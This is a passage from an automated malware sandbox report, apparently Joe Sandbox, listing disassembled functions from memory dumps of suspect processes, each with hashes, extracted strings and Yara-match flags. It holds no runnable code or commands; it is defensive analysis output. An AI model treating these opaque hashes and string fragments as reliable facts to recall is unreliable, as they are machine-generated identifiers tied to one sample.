                                                                • Instruction Fuzzy Hash: B1020476A08341AFD305DF28C494A6ABBE5FFC8704F18892DF9894B264DB31E905CF56
                                                                Function 0561B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction ID: 1415726cbf5397d2a55c6daac0fbc9d99ae5a5604aa2d309a481dec5fe392983
                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction Fuzzy Hash: 71819170E052499EDF24CE68C4517BEBBB2BF55710F1C4159DCA1A77B1CA349881CB6C
                                                                Function 056820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 8862c8710ab2ab34d87c387f11635051512e5f249075bd06f57c0c87a48d70f9
                                                                • Instruction ID: ccee8d02a550d2499b5d65bf35767be9bd86bc2a3c22941cdd54e775af74fef2
                                                                • Opcode Fuzzy Hash: 8862c8710ab2ab34d87c387f11635051512e5f249075bd06f57c0c87a48d70f9
                                                                • Instruction Fuzzy Hash: 8221567AA00119ABDB10EE69C854ABE7BF9FF44650F54011AEE45E3200EB30A915CB95
                                                                Function 055FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 056402E7
                                                                • RTL: Re-Waiting, xrefs: 0564031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 056402BD
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 2e80e3478d2ca45910a8a1b36261b3336ec8c09f82bdfaebfee80917cd81e8ed
                                                                • Instruction ID: 3e4342b16d7dd5168dcd2a747362e992ea2d79c2323a68180fd0d07e9f26f90a
                                                                • Opcode Fuzzy Hash: 2e80e3478d2ca45910a8a1b36261b3336ec8c09f82bdfaebfee80917cd81e8ed
                                                                • Instruction Fuzzy Hash: 09E1A1706087419FD725CF28C888B2ABBE1BF84724F140A5DF6968BBD1DB74E845CB42
                                                                Function 0560BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05647B7F
                                                                • RTL: Resource at %p, xrefs: 05647B8E
                                                                • RTL: Re-Waiting, xrefs: 05647BAC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 7c089c74ac32d4cacc79f9dc87add29adfeb12537144ce97084be68743bdcd2b
                                                                • Instruction ID: ef654f86a42641561397605f25fc5096a894e8294736fe0e40fe18d49eb1a582
                                                                • Opcode Fuzzy Hash: 7c089c74ac32d4cacc79f9dc87add29adfeb12537144ce97084be68743bdcd2b
                                                                • Instruction Fuzzy Hash: AF41D1713047029FC724DE25C840B6BB7E6FB88720F004A1DF95697B90DB70E806CB95
                                                                Function 0560B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0564728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 056472A3
                                                                • RTL: Re-Waiting, xrefs: 056472C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05647294
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 64aa9fa82ec1b5f6f74e9f6605318907d669bad2c69fb0fec832219e4f67edaf
                                                                • Instruction ID: 9492b93af54e6763d04d9f96fd3e70fabd32d1f33dd802ea41159bfd1a4e50d0
                                                                • Opcode Fuzzy Hash: 64aa9fa82ec1b5f6f74e9f6605318907d669bad2c69fb0fec832219e4f67edaf
                                                                • Instruction Fuzzy Hash: C541FD71744606ABC725CE65CC41F6BB7A6FB88720F144619FC55AB780DB30E842CBD5
                                                                Function 05682300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 845f06b3a05ebc910dba811d72601848f1847df293271d97612db82228c0d25e
                                                                • Instruction ID: a1eae301b09b55814caf92e33b6dbe73395e63350cc6b90a4506feb778b4cd91
                                                                • Opcode Fuzzy Hash: 845f06b3a05ebc910dba811d72601848f1847df293271d97612db82228c0d25e
                                                                • Instruction Fuzzy Hash: DF316676A006199FCB20DE29CD64BFEB7F8FF44610F844559E849E3240EB309A55DFA0
                                                                Function 05617D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction ID: ea07530fd62f45ba5f1caafc14a1e32b7a112c86138f32744bbb7d8180c4c7ec
                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                • Instruction Fuzzy Hash: 8C918F71E0420A9EDB24DE69C881ABFB7A6FF44360F1C451AEC56E77C0DA309942CB5C
                                                                Function 055D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 9efb09845894589459295136e1f3dca5efbe060c4cd3f0702e905b54d8e16528
                                                                • Instruction ID: d203773c07780a697cc742bbd315586f82abadb3e86ba9cdb186d5d96918f7f0
                                                                • Opcode Fuzzy Hash: 9efb09845894589459295136e1f3dca5efbe060c4cd3f0702e905b54d8e16528
                                                                • Instruction Fuzzy Hash: 3B812A76D002699BDB35CB94CC59BEAB7B5BF48710F0041EAE90AB7640D7709E84CFA4

                                                                Executed Functions

                                                                Function 03BFC739 Relevance: 24.2, Strings: 19, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $0$5R$6\$=9$D$F$J\$U5$Y&$ZU$_[{"$oq$w}${"$||$3$5$~
                                                                • API String ID: 0-2464818932
                                                                • Opcode ID: 50adfb49d26fc46667c1426bc9b114d916aaf568b76fa7f72157455e0bb2778e
                                                                • Instruction ID: 03ec9a717dc070fc5546b37e3bad9f4628b3139fe478dcfe41827a3430f8eac4
                                                                • Opcode Fuzzy Hash: 50adfb49d26fc46667c1426bc9b114d916aaf568b76fa7f72157455e0bb2778e
                                                                • Instruction Fuzzy Hash: EC328CB090522CCFEB68CF44C994BDDBBB2BB44308F1091E9D2496B295D7756AC9CF44
                                                                Function 03C0A28D Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$O$S$\$s
                                                                • API String ID: 0-3854637164
                                                                • Opcode ID: 0a2c93e1cc579c9a95514098ba9cb73a2c09ae75d27a3221159f257167ba044b
                                                                • Instruction ID: bf44419d2668193b08602758eac5c511126a6f954d850eaee20539cdf2a39ba5
                                                                • Opcode Fuzzy Hash: 0a2c93e1cc579c9a95514098ba9cb73a2c09ae75d27a3221159f257167ba044b
                                                                • Instruction Fuzzy Hash: B2519276D00318ABDB10DF94DC88EFEB3B8EF45311F044199ED09EA140E7709A54ABA1
                                                                Function 03C187DD Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d-
                                                                • API String ID: 0-93839401
                                                                • Opcode ID: e01e35a128fa662221a0714d610abaf691a89007be453f25e093ad3a0c7bb9c2
                                                                • Instruction ID: 78d8d9cc143798a60f2d346e8278d3ecb2a46bfc980fc89814b103fe1c88ec53
                                                                • Opcode Fuzzy Hash: e01e35a128fa662221a0714d610abaf691a89007be453f25e093ad3a0c7bb9c2
                                                                • Instruction Fuzzy Hash: F511F1B6D0121DAF8B44DFE9D9419EEBBF9EF48210F14456AE919E7240E7705A04CBA0
                                                                Function 03C1740D Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cA
                                                                • API String ID: 0-248667037
                                                                • Opcode ID: 89e6815c4eba99df4241a36a0411f24cd9fcf2a4b68f410f4096b900f4f3f6e1
                                                                • Instruction ID: 1384b606681896f66f58444a327ebf54fb68d2798f3cc88734105bcaf43743d7
                                                                • Opcode Fuzzy Hash: 89e6815c4eba99df4241a36a0411f24cd9fcf2a4b68f410f4096b900f4f3f6e1
                                                                • Instruction Fuzzy Hash: 9901E9F6C0121DAFCB40DFE8D940AEEBBF8AB58204F1445AAD919F7200F77156188FA5
                                                                Function 03BF615E Relevance: .1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb881a00d145ee2e5d7a15ff34dcbe3455492bade5cd829cf72b5368e14ea335
                                                                • Instruction ID: 9bfcf16036eefa340acff7ad125f9caccac8ec516a65bd5a500f1a51fe519eab
                                                                • Opcode Fuzzy Hash: eb881a00d145ee2e5d7a15ff34dcbe3455492bade5cd829cf72b5368e14ea335
                                                                • Instruction Fuzzy Hash: D9411DB1E11219AFDB04DF99DC81AEEBBBCEF49710F10415AFA14E6240E7B09644DBE0
                                                                Function 03C1AADD Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11a008d04974d97cd9775a8f0bf1ce3d78128d35beb294e8cc972fc76aad4ac8
                                                                • Instruction ID: 3549877757d12ad43fc41dbaa5164af3978341f03625ee6adb9bad208b4ab75c
                                                                • Opcode Fuzzy Hash: 11a008d04974d97cd9775a8f0bf1ce3d78128d35beb294e8cc972fc76aad4ac8
                                                                • Instruction Fuzzy Hash: E6311AB5A00209AFDB14DF98DC80EEFB7F8EF88300F108159F919A7244D774A915DBA1
                                                                Function 03C1B47D Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f20b0c6393750c1a0928c21d242e486ecf576198f3d8ab8148a85e2a8d7be87
                                                                • Instruction ID: 9e7ffafba8c675ec45f4252eeb857dc76a5bff30ddce8823659bef58b88c8ad6
                                                                • Opcode Fuzzy Hash: 5f20b0c6393750c1a0928c21d242e486ecf576198f3d8ab8148a85e2a8d7be87
                                                                • Instruction Fuzzy Hash: 662171B5A00209AFDB10DF98CC41EAF77B8EF89310F008119F9199B280D730A955DBA1
                                                                Function 03C0A0CD Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 224f97d8b584d8ece18ef602284019da6f21870f821f25b4b45a50294f1ec274
                                                                • Instruction ID: d7bb87470a76fe367ea248fd0225348c2445260c3b7d1de52ee97396ec981d91
                                                                • Opcode Fuzzy Hash: 224f97d8b584d8ece18ef602284019da6f21870f821f25b4b45a50294f1ec274
                                                                • Instruction Fuzzy Hash: 4A1173B63803057AF720DE599C42FAB776C9B85B10F244055FB04EE2C1D6A5F82176B4
                                                                Function 03C1A76D Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bd0d06a1dc33b176a05e257a9af5308c900f38fd26bf33bd733c7588e0c99ff
                                                                • Instruction ID: 888e69c0e8d2d9673fdc6e4add65505fbf3ace8fa5e4b9cb2edf126191ae77fc
                                                                • Opcode Fuzzy Hash: 4bd0d06a1dc33b176a05e257a9af5308c900f38fd26bf33bd733c7588e0c99ff
                                                                • Instruction Fuzzy Hash: A81193755003056FD720EF58CC41FEB77A8EF89710F008559FA29EB280E7706915DBA5
                                                                Function 03C1A8ED Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ade7bd7113b58eb1ee63fb40ecb9d0bc84f714e973d9395c80dd23fc9621c50
                                                                • Instruction ID: ef70cadb7a9488f450ba13a7458600572d27ed04bd88ac7a272d98d0788ba406
                                                                • Opcode Fuzzy Hash: 8ade7bd7113b58eb1ee63fb40ecb9d0bc84f714e973d9395c80dd23fc9621c50
                                                                • Instruction Fuzzy Hash: CD11D0B59003156BD720EF68CC41FFB77ACEB89710F008159FA69AB280EB306914DBA1
                                                                Function 03C1749D Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ae1974cf0f25f75d9c30045ea54f8297eff4901c07f74355625a24245199fe0
                                                                • Instruction ID: 1b4e5ddb77ace489a7f8f84d30c357888b6147a94e2cebb09c92af096f6d242e
                                                                • Opcode Fuzzy Hash: 9ae1974cf0f25f75d9c30045ea54f8297eff4901c07f74355625a24245199fe0
                                                                • Instruction Fuzzy Hash: 9D21F1B6D01219AF9B00DFA9D9419EFB7F9EF48210F04816AE919E7200E7705A15CFE1
                                                                Function 03C1B7ED Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction ID: e3d64c964a6fe91c8618024d2ce057fad049adc34e8bc26c3831fbaebad78def
                                                                • Opcode Fuzzy Hash: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction Fuzzy Hash: 3F018CB6214208BBCB44DE99DC81EEB77ADAF8C714F019218BA19E7240D630F851CBA4
                                                                Function 03BF62B2 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6f8736e579270ab7af874274cda68e4f5f2ff9a2b5d5e931fc9966d70b547e1
                                                                • Instruction ID: 451f8defb177ddfb2ebd22acea7aa9c2a2cca2828209c0c906d6c67b2e481324
                                                                • Opcode Fuzzy Hash: a6f8736e579270ab7af874274cda68e4f5f2ff9a2b5d5e931fc9966d70b547e1
                                                                • Instruction Fuzzy Hash: 09F05077B042529BE7149A6DAC80746F7DCFB44234F280272FD1DCA142E731D05583A0
                                                                Function 03BF632F Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 573853c3480624c764de1df28af929791091bac488f8e81bed615b05531ed1af
                                                                • Instruction ID: fba9b999430e6bbe119f2126b6de4c396fa378c1c68787d58339d1b2af37eb20
                                                                • Opcode Fuzzy Hash: 573853c3480624c764de1df28af929791091bac488f8e81bed615b05531ed1af
                                                                • Instruction Fuzzy Hash: FFF02472C042165FCB148F388C4458AFBA5EF8563872A0769ED98AB291DB32940EC7C1
                                                                Function 03C0A284 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d19de56618783150215f26f8a282ff0388f631ebbe235c922366bb00cc18049d
                                                                • Instruction ID: fa255ce7b3bc24323bae0f3face88359b3c65a11847527f6966b46a4038146c2
                                                                • Opcode Fuzzy Hash: d19de56618783150215f26f8a282ff0388f631ebbe235c922366bb00cc18049d
                                                                • Instruction Fuzzy Hash: C3F0F675C043586EEF10DBB4CC88EEE7B78EF89310F040299F809EB040E67059949B96
                                                                Function 03C1A9ED Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 617cd22e6b6a34ec65addd53948aaddb8ccd67f069f23fcd3a96f297356efafb
                                                                • Instruction ID: 9728f63c8ff06602a736be7d3ddc7abf38c052398b66824b98e62268dc148ad0
                                                                • Opcode Fuzzy Hash: 617cd22e6b6a34ec65addd53948aaddb8ccd67f069f23fcd3a96f297356efafb
                                                                • Instruction Fuzzy Hash: 7FF01CB92002047FD710EE99DC41EEB77ADEF89610F008019BA1CEB241D670B9218BB4
                                                                Function 03C1B70D Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction ID: d1c2327be255852259c581411d7556ca2e0fc1ef345f171e4c4a77fa122a5f30
                                                                • Opcode Fuzzy Hash: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction Fuzzy Hash: AFE09AB62003087BDA20EE98DC41EEB37ACEFC9710F009019FA18AB241D631BC10CBB5
                                                                Function 03C0A1ED Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 635468598e55e387c89dd8fd0cbc0f637a36babdce7f99ddbe059ba385194d59
                                                                • Instruction ID: d11c1d3946c162f0141efc48b965853fd0670acf906a94d1943a45bca581b383
                                                                • Opcode Fuzzy Hash: 635468598e55e387c89dd8fd0cbc0f637a36babdce7f99ddbe059ba385194d59
                                                                • Instruction Fuzzy Hash: 30F08275C0520CEBDB14CFA4D841BDDBBB8EB04320F1083A9E829DB2C0D63597649B81
                                                                Function 03C1D56D Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32e2990ebe8dee4a45d7da2e22c1acb704560b351d746083a571c284ddf6c09e
                                                                • Instruction ID: 0dbc7b202f0e76d44911ea6ed2f1db48d0d36d7565f9cada19939eeb4e834466
                                                                • Opcode Fuzzy Hash: 32e2990ebe8dee4a45d7da2e22c1acb704560b351d746083a571c284ddf6c09e
                                                                • Instruction Fuzzy Hash: 08E04F7660132437D620B999DC09FABB79C8BC2A64F0900A5FE09DF345E5A0AA2066E4
                                                                Function 03C1B3DD Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction ID: 9cfe5fba032b25f09068e78c636c9d06910bef299087e6543d9d9a0a79d0c0f5
                                                                • Opcode Fuzzy Hash: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction Fuzzy Hash: 2DE04F352012047BD610EA99DC00F97779CDBC5714F049025FA1DAB140C670791587B1
                                                                Function 03BFD003 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 261a47b6ae10ce8f977b5027f9e83ce7e817b21a9b37d4eb50fdc1e5b2942b80
                                                                • Instruction ID: a623ba812c8520163f4f3ba5cde920221612376dc73109a0447753660c60fcb0
                                                                • Opcode Fuzzy Hash: 261a47b6ae10ce8f977b5027f9e83ce7e817b21a9b37d4eb50fdc1e5b2942b80
                                                                • Instruction Fuzzy Hash: 23B0120BAB080409CA40F0E140500508746C0D602E33830F48325CC04ECD6808DF1411
                                                                Function 03BFCFBC Relevance: .0, Instructions: 8COMMON
